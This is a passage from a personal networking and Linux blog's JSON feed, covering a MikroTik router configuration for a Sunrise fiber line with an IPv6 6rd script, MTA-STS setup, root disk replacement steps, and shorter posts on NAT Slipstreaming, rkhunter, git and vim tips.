address=$IPv6addr interface=\"6rd\" comment=\"6rd\" advertise=no }#ipv6 for local:global IPv6addrnumberLocal [/ipv6 address find where comment=(\"6rd_local\") and interface=$ipv6localinterface]:if ($IPv6addrnumberLocal!=\"\") do={:global oldip ([/ipv6 address get $IPv6addrnumberLocal address])if ($oldip != $IPv6addrLoc) do={ :log warning \"Updating 6rd LOCAL IPv6 from '$oldip' to '$IPv6addrLoc'.\"; /ipv6 address set number=$IPv6addrnumberLocal address=$IPv6addrLoc disabled=no }} else {:log warning \"Setting up 6rd LOCAL IPv6 '$IPv6addrLoc' na '$ipv6localinterface'. \"; /ipv6 address add address=$IPv6addrLoc interface=$ipv6localinterface comment=\"6rd_local\" advertise=yes }#ipv6 route:global routa [/ipv6 route find where dst-address=\"2000::/3\" and gateway=\"6rd\"]if ($routa=\"\") do={ :log warning \"Setting IPv6 route '2000::/3' pres '6rd'. \"; /ipv6 route add distance=1 dst-address=\"2000::/3\" gateway=\"6rd\" }Once we've added the script we also need to create the scheduler entry to run it periodically (as it needs to re-configure the tunnel and addresses whenever the public IPv4 address changes)./system scheduler add interval=1m name=schedule1 on-event=6rd-scriptAfter the first run of the script we should now have IPv6 connectivity. Let's test this again by checking that we have a public IPv6 address, an IPv6 default route and can ping an IPv6 host in the Internet./ipv6 address print where interface=6rd and global Flags: X - disabled, I - invalid, D - dynamic, G - global, L - link-local # ADDRESS FROM-POOL INTERFACE ADVERTISE 0 G ;;; 6rd 2001:171c:6336:47b0::1/64 6rd no/ipv6 route check 2600:: status: ok interface: 6rd nexthop: 2600::/ping count=1 2600:: SEQ HOST SIZE TTL TIME STATUS 0 2600:: 56 50 118ms echo reply sent=1 received=1 packet-loss=0% min-rtt=118ms avg-rtt=118ms max-rtt=118msAnd that's how you can configure and validate IPv4 and IPv6 connectivity with your own router on a Sunrise fiber line despite them not liking it very much ;-)", "content_html": "Sunrise does not like when people run their own router on a fiber line. While they do not directly forbid it, they don't provide any of the required configuration parameters which makes it quite hard to use your own router.
Below you'll find the required configuration parameters to make your own router connect with IPv4 and IPv6 on a Sunrise fiber line.
Beware though that especially the VLAN configuration might be different depending on your city, the following worked for me in ZĂŒrich.
Also, please note that I do not recommend Sunrise as Internet provider (as a matter of fact I'm on the way out of their contract and switching to SolNet).
Besides not supporting to bring your own router, they also like to make up additional early-termination fees (the contract states 100CHF early termination fees, but once you call them to initiate the process they tell you that it's gonna cost 300CHF as they decided to change their pricing structure unilaterally).
Enough of the ranting, now to the interesting part :-)
The Sunrise line has multiple VLANs to differentiate between Internet, Phone and TV services.
To receive an IPv4 address it requires a special value for the Client Identifier DHCP option.
For IPv6 6rd is employed, for which we need to know the prefix and gateway address.
The following configuration was tested with a MikroTik CRS125 router starting from the default settings.
For simplicity I've named the network interfaces according to their intended usage (eg. LAN
, sunrise
and 6rd
).
The first step is to configure the VLAN on top of your fiber interface. In my case it was VLAN ID 131, others were also successful with VLAN ID 10.
/interface vlan add interface=sfp1-gateway name=sunrise vlan-id=131
Next let's put in place some basic firewall rules to make sure we're not exposing our LAN to the Internet once the connection comes up.
/ip firewall filteradd action=accept chain=forward connection-state=established,relatedadd action=accept chain=forward in-interface=LAN out-interface=sunriseadd action=drop chain=forwardadd action=accept chain=input connection-state=established,relatedadd action=accept chain=input protocol=icmpadd action=drop chain=input in-interface=!LAN
/ip firewall natadd action=masquerade chain=srcnat out-interface=sunrise
Now we can configure the special value for the Client Identifier DHCP option and configure the DHCP client on the VLAN interface.
/ip dhcp-client option add code=61 name=clientid-sunrise value=\"'dslforum.org,Fast5360-sunrise'\"
/ip dhcp-client add dhcp-options=clientid-sunrise disabled=no interface=sunrise
This should now give us IPv4 Internet connectivity. We can test this by checking that we received an IPv4 address, have an IPv4 default route and that we can ping a host in the Internet.
/ip dhcp-client printFlags: X - disabled, I - invalid, D - dynamic # INTERFACE USE-PEER-DNS ADD-DEFAULT-ROUTE STATUS ADDRESS 0 sunrise yes yes bound 198.51.100.123/25
/ip route check 1.1 status: ok interface: sunrise nexthop: 198.51.100.1
/ping count=1 1.1 SEQ HOST SIZE TTL TIME STATUS 0 1.0.0.1 56 59 1ms sent=1 received=1 packet-loss=0% min-rtt=1ms avg-rtt=1ms max-rtt=1ms
Sunrise doesn't offer native IPv6 connectivity but employs 6rd (which defines how to create a 6to4 tunnel based on the public IPv4 address, an IPv6 prefix and the tunnel gateway).
Before we setup the 6rd tunnel, it's important to put in place firewall rules for IPv6 as afterwards all devices on the local network will receive a public IPv6 address.
/ipv6 firewall filteradd action=accept chain=forward connection-state=established,relatedadd action=accept chain=forward in-interface=LANadd action=drop chain=forwardadd action=accept chain=input connection-state=established,relatedadd action=accept chain=input protocol=icmpv6add action=drop chain=input
To setup the 6rd tunnel, I've modified an existing script with the specific parameters for Sunrise (namely the 2001:1710::/28 prefix and the 212.161.209.1 tunnel gateway address).
The script creates the tunnel interface, configures an IPv6 address on the external interface, configures an IPv6 address on the internal interface (which also enables SLAAC to provide IPv6 addresses to the clients on the local network) and configures an IPv6 default route over the 6rd tunnel.
The script itself will be run via the scheduler, thus let's save it under the name 6rd-script.
:global ipv6localinterface \"LAN\":global uplinkinterface \"sunrise\":global IPv4addr [/ip address get [find interface=$uplinkinterface] address];:global IPv4addr [:pick $IPv4addr 0 [:find $IPv4addr \"/\"]]:global IPv4addr2 [:pick $IPv4addr 0 30]:global IPv6temp [:toip6 (\"1::\" . $IPv4addr2)]:global IPv4hex1 [:pick $IPv6temp 3 4]:global IPv4hex2 [:pick $IPv6temp 4 7]:global IPv4hex3 [:pick $IPv6temp 8 9]:global IPv4hex4 [:pick $IPv6temp 9 12]:global IPv6addr [(\"2001:171\" . $IPv4hex1 . \":\". $IPv4hex2 .$IPv4hex3 . \":\" . $IPv4hex4 . \"0::1/64\")]:global IPv6addrLoc [(\"2001:171\" . $IPv4hex1 . \":\". $IPv4hex2 . $IPv4hex3 . \":\" . $IPv4hex4 . \"1::1/64\")]#6to4 interface:global 6to4id [/interface 6to4 find where name=\"6rd\"]:if ($6to4id!=\"\") do={:global 6to4addr [/interface 6to4 get $6to4id local-address]if ($6to4addr != $IPv4addr) do={ :log warning \"Updating local-address for 6to4 tunnel '6rd' from '$6to4addr' to '$IPv4addr'.\"; /interface 6to4 set [find name=\"6rd\"] local-address=$IPv4addr }} else { :log warning \"Creating 6to4 interface '6rd'. \"; /interface 6to4 add !keepalive local-address=$IPv4addr mtu=1480 name=\"6rd\" remote-address=212.161.209.1 }#ipv6 for uplink:global IPv6addrnumber [/ipv6 address find where comment=\"6rd\" and interface=\"6rd\"]:if ($IPv6addrnumber!=\"\") do={:global oldip ([/ipv6 address get $IPv6addrnumber address])if ($oldip != $IPv6addr) do={ :log warning \"Updating 6rd IPv6 from '$oldip' to '$IPv6addr'.\"; /ipv6 address set number=$IPv6addrnumber address=$IPv6addr disabled=no }} else {:log warning \"Setting up 6rd IPv6 '$IPv6addr' to '6rd'. \"; /ipv6 address add address=$IPv6addr interface=\"6rd\" comment=\"6rd\" advertise=no }#ipv6 for local:global IPv6addrnumberLocal [/ipv6 address find where comment=(\"6rd_local\") and interface=$ipv6localinterface]:if ($IPv6addrnumberLocal!=\"\") do={:global oldip ([/ipv6 address get $IPv6addrnumberLocal address])if ($oldip != $IPv6addrLoc) do={ :log warning \"Updating 6rd LOCAL IPv6 from '$oldip' to '$IPv6addrLoc'.\"; /ipv6 address set number=$IPv6addrnumberLocal address=$IPv6addrLoc disabled=no }} else {:log warning \"Setting up 6rd LOCAL IPv6 '$IPv6addrLoc' na '$ipv6localinterface'. \"; /ipv6 address add address=$IPv6addrLoc interface=$ipv6localinterface comment=\"6rd_local\" advertise=yes }#ipv6 route:global routa [/ipv6 route find where dst-address=\"2000::/3\" and gateway=\"6rd\"]if ($routa=\"\") do={ :log warning \"Setting IPv6 route '2000::/3' pres '6rd'. \"; /ipv6 route add distance=1 dst-address=\"2000::/3\" gateway=\"6rd\" }
Once we've added the script we also need to create the scheduler entry to run it periodically (as it needs to re-configure the tunnel and addresses whenever the public IPv4 address changes).
/system scheduler add interval=1m name=schedule1 on-event=6rd-script
After the first run of the script we should now have IPv6 connectivity. Let's test this again by checking that we have a public IPv6 address, an IPv6 default route and can ping an IPv6 host in the Internet.
/ipv6 address print where interface=6rd and global Flags: X - disabled, I - invalid, D - dynamic, G - global, L - link-local # ADDRESS FROM-POOL INTERFACE ADVERTISE 0 G ;;; 6rd 2001:171c:6336:47b0::1/64 6rd no
/ipv6 route check 2600:: status: ok interface: 6rd nexthop: 2600::
/ping count=1 2600:: SEQ HOST SIZE TTL TIME STATUS 0 2600:: 56 50 118ms echo reply sent=1 received=1 packet-loss=0% min-rtt=118ms avg-rtt=118ms max-rtt=118ms
And that's how you can configure and validate IPv4 and IPv6 connectivity with your own router on a Sunrise fiber line despite them not liking it very much ;-)
", "url": "https://blog.x-way.org/Networking/2020/12/05/Using-your-own-router-on-a-Sunrise-fiber-line.html", "tags": ["Networking"], "date_published": "2020-12-05T22:26:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324282", "title": "MTA-STS", "content_text": "Recently I added MTA-STS support to one of my domains, and it turns out that this was easier than expected.MTA-STS is used to tell mail senders that your server supports TLS. And then you can define the policy for your server and tell them that they should only use TLS (resp. STARTTLS) when connecting to you and not fall back to unencrypted SMTP.The way this works is with two components:\ta special _mta-sts.<your-site.com> TXT DNS entry indicating that your domain supports MTA-STS and the version number of your MTA-STS policy\ta mta-sts.txt file served under a specific well-known URL https://mta-sts.<your-site.com>/.well-known/mta-sts.txt containing your MTA-STS policy (which mx hosts it is valid for, should it be run in enforcing or testing mode, max-age etc.)The idea is that a mail sender checks your MTA-STS policy through protected channels (DNSSEC, HTTPS) and then never sends mails to you in plaintext (similar approach as HSTS for HTTP but this time between mail servers).To setup the MTA-STS configuration, I followed this Enable MTA-STS in 5 Minutes with NGINX guide from Yoonsik Park.Then to check my configuration I used this MTA-STS validator (which is an opensource project available on GitHub), the classic checktls.com //email/testTo: tool (MTA-STS checking needs to be explicitly enabled under 'More Options') and the free testing service provided by Hardenize.", "content_html": "Recently I added MTA-STS support to one of my domains, and it turns out that this was easier than expected.
MTA-STS is used to tell mail senders that your server supports TLS. And then you can define the policy for your server and tell them that they should only use TLS (resp. STARTTLS) when connecting to you and not fall back to unencrypted SMTP.
The way this works is with two components:
_mta-sts.<your-site.com>
TXT DNS entry indicating that your domain supports MTA-STS and the version number of your MTA-STS policyhttps://mta-sts.<your-site.com>/.well-known/mta-sts.txt
containing your MTA-STS policy (which mx hosts it is valid for, should it be run in enforcing or testing mode, max-age etc.)The idea is that a mail sender checks your MTA-STS policy through protected channels (DNSSEC, HTTPS) and then never sends mails to you in plaintext (similar approach as HSTS for HTTP but this time between mail servers).
To setup the MTA-STS configuration, I followed this Enable MTA-STS in 5 Minutes with NGINX guide from Yoonsik Park.
Then to check my configuration I used this MTA-STS validator (which is an opensource project available on GitHub), the classic checktls.com //email/testTo: tool (MTA-STS checking needs to be explicitly enabled under 'More Options') and the free testing service provided by Hardenize.
", "url": "https://blog.x-way.org/Networking/2020/11/21/MTA-STS.html", "tags": ["Networking"], "date_published": "2020-11-21T09:47:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324281", "title": "15 years of o5", "content_text": "15 years ago this weblog received the current o5 design (or theme as it would be called nowadays).During this time the design has aged quite well and also survived the move of the backend from a self-written PHP blog-engine to Jekyll.Although it still works surprisingly well and presents the content nicely every day, there are some parts where better usage of contemporary technologies would be desirable.It has no mobile version nor a responsive layout as the design was created before the now omnipresent smartphones were invented. Similar is the font-size hardcoded and not very adequate for todays retina displays. And yes, it uses the XHTML 1.0 strict standard with all its quirks and CSS tricks from 2002 (which luckily are still supported in current browsers).Overall I'm quite happy that the o5 design has turned out to be so timeless and that I did not have to come up with a new one every other year (btw: I don't remember where the o5 name came from, likely the 5 is a reference to 2005 when it was created).With the current Corona situation forcing me to spend more time at home again, I have the feeling that some things might change around the weblog (not quite sure what or when exactly, first I need to re-learn how websites are built in 2020 :-).", "content_html": "15 years ago this weblog received the current o5 design (or theme as it would be called nowadays).
During this time the design has aged quite well and also survived the move of the backend from a self-written PHP blog-engine to Jekyll.
Although it still works surprisingly well and presents the content nicely every day, there are some parts where better usage of contemporary technologies would be desirable.
It has no mobile version nor a responsive layout as the design was created before the now omnipresent smartphones were invented. Similar is the font-size hardcoded and not very adequate for todays retina displays. And yes, it uses the XHTML 1.0 strict standard with all its quirks and CSS tricks from 2002 (which luckily are still supported in current browsers).
Overall I'm quite happy that the o5 design has turned out to be so timeless and that I did not have to come up with a new one every other year (btw: I don't remember where the o5 name came from, likely the 5 is a reference to 2005 when it was created).
With the current Corona situation forcing me to spend more time at home again, I have the feeling that some things might change around the weblog (not quite sure what or when exactly, first I need to re-learn how websites are built in 2020 :-).
", "url": "https://blog.x-way.org/Webdesign/2020/11/01/15-years-of-o5.html", "tags": ["Webdesign"], "date_published": "2020-11-01T19:03:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324280", "title": "NAT Slipstreaming (NAT traversal part 2)", "content_text": "Compared to the previous post where intentional NAT traversal was discussed, here now comes an article about 'unintentional' (malicious) NAT traversal.Samy Kamar describes in his NAT Slipstreaming article how a combination of TCP packet segmentation and smuggling SIP requests in HTTP, can be used to trick the NAT ALG of your router into opening arbitrary ports for inbound connections from the Internet to your computer.The article analyses in detail the SIP ALG of the Linux netfilter stack in it's default configuration, but likely similar attacks could also be possible with ALGs of other protocols and vendors.Important to note: the Linux SIP ALG module has two parameters (sip_direct_media and sip_direct_signalling), which restrict the IP address for which additional ports are opened to the one sending the original SIP packet. By default they are set to 1, but if any of these is set to 0 in a router's configuration, the described NAT Slipstreaming attack will not only allow to make inbound connections to your computer, but also to any other device in the local network!", "content_html": "Compared to the previous post where intentional NAT traversal was discussed, here now comes an article about 'unintentional' (malicious) NAT traversal.
Samy Kamar describes in his NAT Slipstreaming article how a combination of TCP packet segmentation and smuggling SIP requests in HTTP, can be used to trick the NAT ALG of your router into opening arbitrary ports for inbound connections from the Internet to your computer.
The article analyses in detail the SIP ALG of the Linux netfilter stack in it's default configuration, but likely similar attacks could also be possible with ALGs of other protocols and vendors.
Important to note: the Linux SIP ALG module has two parameters (sip_direct_media and sip_direct_signalling), which restrict the IP address for which additional ports are opened to the one sending the original SIP packet. By default they are set to 1, but if any of these is set to 0 in a router's configuration, the described NAT Slipstreaming attack will not only allow to make inbound connections to your computer, but also to any other device in the local network!
", "url": "https://blog.x-way.org/Networking/2020/10/31/NAT-Slipstreaming.html", "tags": ["Networking"], "date_published": "2020-10-31T22:55:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324279", "title": "How NAT traversal works", "content_text": "How NAT traversal works – is a very well written and detailed article from Dave Anderson explaining the different NAT scenarios and the tricks that can be used to establish a peer-to-peer UDP connection between machines sitting behind them.", "content_html": "How NAT traversal works – is a very well written and detailed article from Dave Anderson explaining the different NAT scenarios and the tricks that can be used to establish a peer-to-peer UDP connection between machines sitting behind them.
", "url": "https://blog.x-way.org/Networking/2020/08/23/How-NAT-traversal-works.html", "tags": ["Networking"], "date_published": "2020-08-23T21:08:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324278", "title": "Replace the root disk", "content_text": "Recently the disk holding the root (/) filesystem on one of my linux systems started to report increased SMART raw read error rates, seek error rates and ECC recovered hardware errors.As these are early indications of a failing disk, it became time to replace the disk.Normally replacing a disk comes down to plugging in the new one, coyping over the data, umount the old disk, mount the new one in place, unplug the old disk.But when it is the disk with the root filesystem a couple extra steps are needed.The steps below worked for my Debian system without problems (even used the opportunity to upgrade to an SSD :-)(source is this thread on StackExchange)The following makes some assumptions:\tAll commands ran as root when possible\tYou are on a physical console to the host (need to type in grub commands to boot up the new disk!)\tYou want an ext4 files system\tYou are loosely familiar on a basic level with all commands run\tYou are NOT booting from a RAID deviceSo here we go.\tPhysically install new disk into computer and connect to available port leaving old disk in existing position.\tBoot computer into old OS.\tPrepare and mount new disk; first identify new disk\t\tfdisk -l\t\tPartition new disk\t\tfdisk /dev/(newdisk)\t\tMake partition primary partition with type \"83\" file system type.\t\tCreate filesystem\t\tmkfs.ext4 /dev/(newpartition)\t\tMount new filesystem\t\tmkdir /mnt/(newpartitionmountpoint)\t\tmount /dev/(newpartition) /mnt/(newpartitionmountpoint)\t\tCopy disk:\t\t/sbin/init 1 (drop to single user mode)\t\trsync -avxHAX / /mnt/(newpartitionmountpoint)\t\tUpdate FSTAB on newdisk\t\tblkid (note UUID of new partition)\t\tvi /mnt/(newpartitionmountpoint)/etc/fstab\t\tReplace existing UUID of / in FSTAB to new disk UUID\t\tConfigure grub and install to new disk boot loader:\t\tgrub-mkconfig\t\tupdate-grub\t\tgrub-install /dev/(newdisk)\t\tCopy grub.cfg from old disk to new\t\tcp -ax /boot/grub/grub.cfg /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg\t\tOpen grub.cfg on new disk and replace all UUIDs with new disk\t\tvi /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg\t\tReplace all old UUIDs with the UUID of the new disk\t\tShut down computer\t\tshutdown\t\tPhysically move the new drive to the 1st drive location and remove old drive\tStart computer and grub should present:error: no such device: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxGRUB rescue>\t\tManually boot new OS from grub; first identify the drive and partition of the boot files\t\tls [to identify your drive and partition options]\t\tls (hdx,p)/ [to identify which partition has the /boot folder]\t\tThen, you can load the boot menu manually from the drive and partition you found above. Typically this would be (hd0,msdos1).\t\tset prefix=\"(hdx,p)/boot/grub\"\t\tset root=\"(hdx,p)\"\t\tinsmod normal\t\tnormal\t\tLogin to OS on new drive\tConfigure grub again\t\tfdisk -l (note dev of newdisk)\t\tgrub-mkconfig\t\tupdate-grub\t\tgrub-install /dev/newdisk\tAnd that should be it!", "content_html": "Recently the disk holding the root (/) filesystem on one of my linux systems started to report increased SMART raw read error rates, seek error rates and ECC recovered hardware errors.
As these are early indications of a failing disk, it became time to replace the disk.
Normally replacing a disk comes down to plugging in the new one, coyping over the data, umount the old disk, mount the new one in place, unplug the old disk.
But when it is the disk with the root filesystem a couple extra steps are needed.
The steps below worked for my Debian system without problems (even used the opportunity to upgrade to an SSD :-)
(source is this thread on StackExchange)
", "url": "https://blog.x-way.org/Linux/2020/06/07/Replace-the-root-disk.html", "tags": ["Linux"], "date_published": "2020-06-07T10:58:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324277", "title": "rkhunter CRLF confusion", "content_text": "On my Linux hosts I'm running rkhunter. On a newly configured host it lately reported the following warning:Warning: The SSH and rkhunter configuration options should be the same: SSH configuration option 'PermitRootLogin': no\tRkhunter configuration option 'ALLOW_SSH_ROOT_USER': noOn first sight the warning does not seem to make much sense, as both configuration options seem to be set to the same value (no).But digging further reveals that they are stored slightly different:# file /etc/rkhunter.conf/etc/rkhunter.conf: ASCII text# file /etc/ssh/sshd_config/etc/ssh/sshd_config: ASCII text, with CRLF line terminatorsTurns out that rkhunter is also checking the line terminators as part of the configuration values, and warns because they are different.Knowing this, the fix is simple: run dos2unix on the CRLF file", "content_html": "The following makes some assumptions:
\t
- All commands ran as root when possible
\t- You are on a physical console to the host (need to type in grub commands to boot up the new disk!)
\t- You want an ext4 files system
\t- You are loosely familiar on a basic level with all commands run
\t- You are NOT booting from a RAID device
So here we go.
\t
- Physically install new disk into computer and connect to available port leaving old disk in existing position.
\t- Boot computer into old OS.
\t- Prepare and mount new disk; first identify new disk
\t
\t\tfdisk -l\t- Partition new disk
\t
\t\tfdisk /dev/(newdisk)
\t\tMake partition primary partition with type \"83\" file system type.\t- Create filesystem
\t
\t\tmkfs.ext4 /dev/(newpartition)\t- Mount new filesystem
\t
\t\tmkdir /mnt/(newpartitionmountpoint)
\t\tmount /dev/(newpartition) /mnt/(newpartitionmountpoint)\t- Copy disk:
\t
\t\t/sbin/init 1 (drop to single user mode)
\t\trsync -avxHAX / /mnt/(newpartitionmountpoint)\t- Update FSTAB on newdisk
\t
\t\tblkid (note UUID of new partition)
\t\tvi /mnt/(newpartitionmountpoint)/etc/fstab
\t\tReplace existing UUID of / in FSTAB to new disk UUID\t- Configure grub and install to new disk boot loader:
\t
\t\tgrub-mkconfig
\t\tupdate-grub
\t\tgrub-install /dev/(newdisk)\t- Copy grub.cfg from old disk to new
\t
\t\tcp -ax /boot/grub/grub.cfg /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg\t- Open grub.cfg on new disk and replace all UUIDs with new disk
\t
\t\tvi /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg
\t\tReplace all old UUIDs with the UUID of the new disk\t- Shut down computer
\t
\t\tshutdown\t- Physically move the new drive to the 1st drive location and remove old drive
\t- Start computer and grub should present:
\terror: no such device: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxGRUB rescue>\t- Manually boot new OS from grub; first identify the drive and partition of the boot files
\t
\t\tls [to identify your drive and partition options]
\t\tls (hdx,p)/ [to identify which partition has the /boot folder]\t- Then, you can load the boot menu manually from the drive and partition you found above. Typically this would be (hd0,msdos1).
\t
\t\tset prefix=\"(hdx,p)/boot/grub\"
\t\tset root=\"(hdx,p)\"
\t\tinsmod normal
\t\tnormal\t- Login to OS on new drive
\t- Configure grub again
\t\tfdisk -l (note dev of newdisk)
\t\tgrub-mkconfig
\t\tupdate-grub
\t\tgrub-install /dev/newdisk\tAnd that should be it!
On my Linux hosts I'm running rkhunter. On a newly configured host it lately reported the following warning:
Warning: The SSH and rkhunter configuration options should be the same: SSH configuration option 'PermitRootLogin': no\tRkhunter configuration option 'ALLOW_SSH_ROOT_USER': no
On first sight the warning does not seem to make much sense, as both configuration options seem to be set to the same value (no
).
But digging further reveals that they are stored slightly different:
# file /etc/rkhunter.conf/etc/rkhunter.conf: ASCII text# file /etc/ssh/sshd_config/etc/ssh/sshd_config: ASCII text, with CRLF line terminators
Turns out that rkhunter is also checking the line terminators as part of the configuration values, and warns because they are different.
Knowing this, the fix is simple: run dos2unix on the CRLF file
", "url": "https://blog.x-way.org/Linux/2020/05/24/rkhunter-CRLF-confusion.html", "tags": ["Linux"], "date_published": "2020-05-24T11:22:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324276", "title": "ipaddr CLI tool", "content_text": "While doing some maintenance on my server, I got tired of searching through the output of ip addr show to find the IP addresses configured on the interfaces.Thus I wrote a simple CLI tool to display the information I needed in a concise and human friendly form: ipaddr$ ipaddrlo 127.0.0.1/8ens5 198.51.100.160/24tun24008 10.123.199.78/32tun71991639 10.200.123.5/32tun26724 10.100.100.235/32tun3883710 10.123.111.7/32A nice side-effect of writing this in Go is that it works out-of-the-box also on non-Linux systems :-)", "content_html": "While doing some maintenance on my server, I got tired of searching through the output of ip addr show
to find the IP addresses configured on the interfaces.
Thus I wrote a simple CLI tool to display the information I needed in a concise and human friendly form: ipaddr
$ ipaddrlo 127.0.0.1/8ens5 198.51.100.160/24tun24008 10.123.199.78/32tun71991639 10.200.123.5/32tun26724 10.100.100.235/32tun3883710 10.123.111.7/32
A nice side-effect of writing this in Go is that it works out-of-the-box also on non-Linux systems :-)
", "url": "https://blog.x-way.org/Networking/2020/05/21/ipaddr-CLI-tool.html", "tags": ["Networking"], "date_published": "2020-05-21T19:38:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324275", "title": "Poor man's reboot notification", "content_text": "Sometimes you need to be notified about reboots of a machine without having the luxury of a proper monitoring system.The following crontab entry triggers an e-mail when the host has been rebooted in the last 5 minutes.*/5 * * * * [ $(sed -e 's/\\..*//' /proc/uptime) -lt 540 ] && echo \"Host has been rebooted! Uptime: $(uptime)\"", "content_html": "Sometimes you need to be notified about reboots of a machine without having the luxury of a proper monitoring system.
The following crontab entry triggers an e-mail when the host has been rebooted in the last 5 minutes.
*/5 * * * * [ $(sed -e 's/\\..*//' /proc/uptime) -lt 540 ] && echo \"Host has been rebooted! Uptime: $(uptime)\"", "url": "https://blog.x-way.org/Linux/2020/04/18/Poor-mans-reboot-notification.html", "tags": ["Linux"], "date_published": "2020-04-18T15:03:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324274", "title": "Cottage cheese Avocado Crostini", "content_text": "Inspired by this recipe, I made some yummy Crostini using Cottage cheese (instead of Ricotta cheese) and Avocado with some drops of Aceto balsamico.", "content_html": "
Inspired by this recipe, I made some yummy Crostini using Cottage cheese (instead of Ricotta cheese) and Avocado with some drops of Aceto balsamico.
", "url": "https://blog.x-way.org/Food/2020/04/12/Cottage-cheese-Avocado-Crostini.html", "tags": ["Food"], "date_published": "2020-04-12T19:16:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324273", "title": "Ein Lied fĂŒr Jetzt", "content_text": "", "content_html": "", "url": "https://blog.x-way.org/Music/2020/03/28/Ein-Lied-fur-Jetzt.html", "tags": ["Music"], "date_published": "2020-03-28T08:53:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324272", "title": "ip_compact and ip_diff", "content_text": "Somehow I always end up working with lists of IP networks and needing to minimize and compare them.Some of my Perl scripts for this might still be hidden in a corporate source repository, and somewhere in the backups of my old Linux laptop should be even earlier attempts in Bash.Both of them are not very useful to me where they are, thus I've written yet another version.This time in Go using the ipaddr package.Say hello to ip_compact and ip_diff :-)", "content_html": "Somehow I always end up working with lists of IP networks and needing to minimize and compare them.
Some of my Perl scripts for this might still be hidden in a corporate source repository, and somewhere in the backups of my old Linux laptop should be even earlier attempts in Bash.
Both of them are not very useful to me where they are, thus I've written yet another version.
This time in Go using the ipaddr package.
Say hello to ip_compact and ip_diff :-)
", "url": "https://blog.x-way.org/Networking/2020/03/21/ip_compact-and-ip_diff.html", "tags": ["Networking"], "date_published": "2020-03-21T15:18:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324271", "title": "#StayTheFuckHome", "content_text": "Stay The Fuck Home!", "content_html": "", "url": "https://blog.x-way.org/Music/2020/03/17/StayTheFuckHome.html", "tags": ["Music"], "date_published": "2020-03-17T19:33:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324270", "title": "This Page is Designed to Last", "content_text": "This Page is Designed to Last — a manifesto from Jeff Huang for preserving content on the web, where he advocates to keep content on the web available and pledges to keep his site available for the next 10 years.Having my content in this weblog online since 2002, I can very much relate to this initiative and additionally would like to point to the efforts of archive.org (aka. The Internet Archive).The wayback machine of archive.org allows to see old versions of websites, even when the website itself is no longer available.For me personally this became critically useful when the database of my weblog vanished with no current backup and I then used the archived versions from archive.org to restore the missing content.Thus I would like to encourage everyone to support the efforts of archive.org with a donation.", "content_html": "This Page is Designed to Last — a manifesto from Jeff Huang for preserving content on the web, where he advocates to keep content on the web available and pledges to keep his site available for the next 10 years.
Having my content in this weblog online since 2002, I can very much relate to this initiative and additionally would like to point to the efforts of archive.org (aka. The Internet Archive).
The wayback machine of archive.org allows to see old versions of websites, even when the website itself is no longer available.
For me personally this became critically useful when the database of my weblog vanished with no current backup and I then used the archived versions from archive.org to restore the missing content.
Thus I would like to encourage everyone to support the efforts of archive.org with a donation.
", "url": "https://blog.x-way.org/Misc/2019/12/20/This-Page-is-Designed-to-Last.html", "tags": ["Misc"], "date_published": "2019-12-20T09:56:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324269", "title": "The Comet Is Coming", "content_text": "The Comet Is Coming is a 21st century style Jazz band.Discovered at the Jazznojazz festival :-)", "content_html": "The Comet Is Coming is a 21st century style Jazz band.
Discovered at the Jazznojazz festival :-)
More productive Git — a short article from James Turnbull with 'Tips for acquiring Git super powers'.
TL;DR:
git reset <filename>
git cherry-pick <commitid>
git commit --amend
git stash
git log --stat
git bisect
Engineering Management: The Pendulum Or The Ladder — a well written article from Charity Majors about the non-trivial entanglement between engineering and management, explaining how doing everything at the same time does lead to unhappy/un-fulfilled people. Also worth reading in this context is the prequel article The Engineer/Manager Pendulum.
", "url": "https://blog.x-way.org/Coding/2019/01/06/Engineering-Management.html", "tags": ["Coding"], "date_published": "2019-01-06T13:21:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324266", "title": "Blogroll cleanup", "content_text": "As some links on my blogroll start to turn into 404 errors it's time to do some cleanup and also to bring in some fresh blood :-)Removed:\tmezzoblue\tDave Shea\tPepilog\te.loge\tEDV\tsid.rstack.org/blog\tCode Candies\tthePacketGeek\tlovfooodAdded:\tcharity.wtf", "content_html": "As some links on my blogroll start to turn into 404 errors it's time to do some cleanup and also to bring in some fresh blood :-)
Removed:
Added:
", "url": "https://blog.x-way.org/Misc/2019/01/06/Blogroll-cleanup.html", "tags": ["Misc"], "date_published": "2019-01-06T12:55:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324265", "title": "New Year - New Vim Trick", "content_text": "Happy 2019! I have learnt a new Vim trick:When searching for some pattern with / (eg. /mystring), often the next step is to perform a replacement command.Now instead of re-typing the whole string, you can directly enter the substitution command with an emtpy search-pattern (:%s//newstring/), Vim then automatically re-uses the previous search pattern.(via)", "content_html": "Happy 2019! I have learnt a new Vim trick:
When searching for some pattern with / (eg. /mystring), often the next step is to perform a replacement command.Now instead of re-typing the whole string, you can directly enter the substitution command with an emtpy search-pattern (:%s//newstring/), Vim then automatically re-uses the previous search pattern.
(via)
